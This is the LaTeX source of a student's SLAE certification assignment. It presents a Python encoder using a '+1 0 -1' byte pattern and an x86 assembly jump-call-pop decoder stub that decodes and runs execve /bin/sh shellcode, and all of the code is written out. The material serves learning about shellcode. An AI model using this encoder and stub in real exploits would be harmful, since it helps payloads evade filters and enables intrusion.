\documentclass{article} 
\title{Custom Encoder/Decoder}
\author{Marco Nappi} 
\usepackage{listings}
\usepackage{geometry}
\geometry{
	a4paper,
	total={170mm,257mm},
	left=20mm,
	top=20mm,
}\usepackage{hyperref}
\hypersetup{
colorlinks=true,
linkcolor=blue,
filecolor=magenta,
urlcolor=blue,
}
\begin{document}
\maketitle
\section*{SLAE Assignament 4}
This is the Fourth SLAE assignment that requires to make a custom encoder in a scripting language and a decoder stub in Asm x86.\\
The payload to encode is the one that spawn an sh shell.\\
The encoder i have made is an encoder that follow the following pattern :\\
+1 0 -1
\section*{Asm code tips}
The last question before starting to write the Asm code is :\\
How to call a syscall using Asm in Linux 86 ?\\
To call a syscall we have to work with the register like so:\\\\	
$\bullet$ In EAX we put the number of the syscall\\
$\bullet$ In EBX we put the first argument of the syscall\\
$\bullet$ In ECX we put the second argument of the syscall\\
$\bullet$ In EDX we put the third argument of the syscall\\
$\bullet$ In ESI we put the fourth argument of the syscall\\
$\bullet$ In EDI we put the fifth argument of the syscall\\
\\
What happens after a call instruction ?\\
If after a call instruction there is some data those are pushed onto the stack so we use the jump-call-pop technique to push the pointer of the data on the stack 
\newpage
\section*{The asm code}
\begin{lstlisting}[language={[x86masm]Assembler}]
global _start

_start:
jmp short shellcode ; first step of jump-call-pop technique  

startup:
pop esi
; using the jump-call-pop technique to store the shellcode into esi
xor ebx,ebx ; zeroing the ebx register
xor eax,eax ; zeroing the eax register
mov al,mlen ; moving the length of the payload
mov dl,0x03 ; setting the divisor aka the step
div dl ; diving by the step to get the number of iteration
decode:
sub byte [esi+ebx+0x00],0x01 ; -1 to the x byte
add byte [esi+ebx+0x02],0x01 ; +1 to the x+2 byte
add bl,0x03 ; adding each iteration 3 (the step length)
dec dl ; decreasing the counter
jz shellcode_real ; if we decoded all the shell we ran it
jmp decode    ; else we continue the decoding process
shellcode:
call startup ; second step of jump-call-pop technique
shellcode_real:
db 0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,
0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80,0x90,0x90
mlen equ  $-shellcode_real
\end{lstlisting}
\section*{The wrapper}
\subsection*{What it does}
For this assignment a python3 wrapper that: 
\begin{enumerate}
	\item Take as input the shellcode to be encoded
	\item Check the number of bytes and if that  is dividable by 3
	\item If the number is NOT dividable by 3 adds x NOP opcode "\textbackslash x90" to make it dividable by 3
	\item Add 1 to the x byte
	\item Do nothing to the x+1 byte
	\item Subtract 1 to the x+2 byte
	\item Replace \textbackslash x into 0x
	\item Prints the encoded shellcode
\end{enumerate}
\subsection*{The Code}
\begin{lstlisting}[language=Python]
payload=(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
enc=""

x=0
while len(payload)%3 != 0:
	payload+=b"\x90"


while(x < len(payload)):	
	enc+=hex(payload[x]+1)
	x=x+1
	enc+=hex(payload[x])
	x=x+1
	enc+=hex(payload[x]-1)
	x=x+1
else:	
	print(enc.replace("0x",",0x")[1:len(enc)*4:])
\end{lstlisting}

All the code and the wrapper(s) can be found a this link on gitlab.
\section*{Gitlab Repository}
Here it is the link to my SLAE repository:\\
\url{https://gitlab.com/mrcnpp/SLAE/-/tree/master/SLAE32}
\section*{References}
A good alternative to the man cmd is this site:\\
\url{https://man7.org/linux/man-pages/man2}\\
Thanks to all guys of the "Assemblers County" who helped me 
\section*{SLAE Statement}
This blog post has been	created	for	completing the requirements of the	SecurityTube Linux Assembly	Expert certification:\\
\url{http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert}\\
Student ID: SLAE-1545  
\end{document}